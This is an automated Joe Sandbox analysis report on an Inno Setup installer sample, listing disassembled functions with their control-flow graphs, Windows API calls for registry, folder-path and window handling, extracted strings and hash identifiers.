                                                                                        • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                        • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                        • API String ID: 2230631259-2623177817
                                                                                        • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                        • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                        • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                        • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1647 468d88-468dc0 call 47c26c 1650 468dc6-468dd6 call 478e24 1647->1650 1651 468fa2-468fbc call 403420 1647->1651 1656 468ddb-468e20 call 4078f4 call 403738 call 42de1c 1650->1656 1662 468e25-468e27 1656->1662 1663 468e2d-468e42 1662->1663 1664 468f98-468f9c 1662->1664 1665 468e57-468e5e 1663->1665 1666 468e44-468e52 call 42dd4c 1663->1666 1664->1651 1664->1656 1668 468e60-468e82 call 42dd4c call 42dd64 1665->1668 1669 468e8b-468e92 1665->1669 1666->1665 1668->1669 1688 468e84 1668->1688 1671 468e94-468eb9 call 42dd4c * 2 1669->1671 1672 468eeb-468ef2 1669->1672 1691 468ebb-468ec4 call 4314f8 1671->1691 1692 468ec9-468edb call 42dd4c 1671->1692 1674 468ef4-468f06 call 42dd4c 1672->1674 1675 468f38-468f3f 1672->1675 1689 468f16-468f28 call 42dd4c 1674->1689 1690 468f08-468f11 call 4314f8 1674->1690 1677 468f41-468f75 call 42dd4c * 3 1675->1677 1678 468f7a-468f90 RegCloseKey 1675->1678 1677->1678 1688->1669 1689->1675 1700 468f2a-468f33 call 4314f8 1689->1700 1690->1689 1691->1692 1692->1672 1704 468edd-468ee6 call 4314f8 1692->1704 1700->1675 1704->1672
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                        Strings
                                                                                        • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                        • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                        • Inno Setup: App Path, xrefs: 00468E4A
                                                                                        • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                        • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                        • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                        • %s\%s_is1, xrefs: 00468E05
                                                                                        • Inno Setup: No Icons, xrefs: 00468E73
                                                                                        • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                        • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                        • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                        • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                        • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                        • API String ID: 47109696-1093091907
                                                                                        • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                        • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                        • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                        • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                          • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                          • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                        • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                        • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                                          • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                        • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                        • API String ID: 3771764029-544719455
                                                                                        • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                        • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                        • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                        • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1957 4238e2 1954->1957 1958 4238e5-4238ef GetSystemMetrics 1954->1958 1955->1954 1956 4238c1-4238d2 call 408cbc call 40311c 1955->1956 1956->1954 1957->1958 1960 4238f1 1958->1960 1961 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1958->1961 1960->1961 1972 423952-423965 call 424178 SendMessageA 1961->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1961->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
                                                                                        APIs
                                                                                          • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                        • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                        • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                        • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                        • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                        • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                        • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                        • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                        • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                        • String ID: |6B
                                                                                        • API String ID: 183575631-3009739247
                                                                                        • Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                        • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                        • Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                        • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1999 47cefb-47cf01 1994->1999 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1999->1991 1999->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(73AF0000,SHGetFolderPathA), ref: 0047CF7A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                        • API String ID: 190572456-256906917
                                                                                        • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                        • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                        • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                        • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                        • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModulePolicyProcess
                                                                                        • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                        • API String ID: 3256987805-3653653586
                                                                                        • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                        • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                        • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                        • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                        APIs
                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                        • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                        • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongWindow$Prop
                                                                                        • String ID: 3A$yA
                                                                                        • API String ID: 3887896539-3278460822
                                                                                        • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                        • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                        • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                        • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2916 4672d0-4672da call 47d33c 2910->2916 2917 4672df-4672e3 2910->2917 2916->2917 2920 4672e5-467308 call 403738 SHGetFileInfo 2917->2920 2921 46733d-467371 call 403400 * 2 2917->2921 2920->2921 2930 46730a-467311 2920->2930 2930->2921 2931 467313-467338 ExtractIconA call 4670c0 2930->2931 2931->2921 2932->2921
                                                                                        APIs
                                                                                        • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                        • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                          • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                          • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                        • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                        • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                        • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                        • String ID: c:\directory$shell32.dll$%H
                                                                                        • API String ID: 3376378930-166502273
                                                                                        • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                        • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                        • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                        • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                        APIs
                                                                                        • GetActiveWindow.USER32 ref: 0042F58F
                                                                                        • GetFocus.USER32 ref: 0042F597
                                                                                        • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                        • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                        • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                        • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                        • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                        • String ID: TWindowDisabler-Window
                                                                                        • API String ID: 3167913817-1824977358
                                                                                        • Opcode ID: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                        • Instruction ID: c3989f54cd535b42bfd745bd8d6279a550c1ea008e6f4be51b2d228796931bcd
                                                                                        • Opcode Fuzzy Hash: d82bdac47665a0423d7aef7e4f95abac113c6b4ba7ee72313a02f6ddbd37ff30
                                                                                        • Instruction Fuzzy Hash: B021A170740710BAE310EF66AD43F1A76B8EB04B44F91853BF604AB2E1D7B86D0586AD
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                        • API String ID: 1646373207-2130885113
                                                                                        • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                        • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                        • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                        • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                        APIs
                                                                                        • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                        • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                        • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                        • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                        • API String ID: 4130936913-2943970505
                                                                                        • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
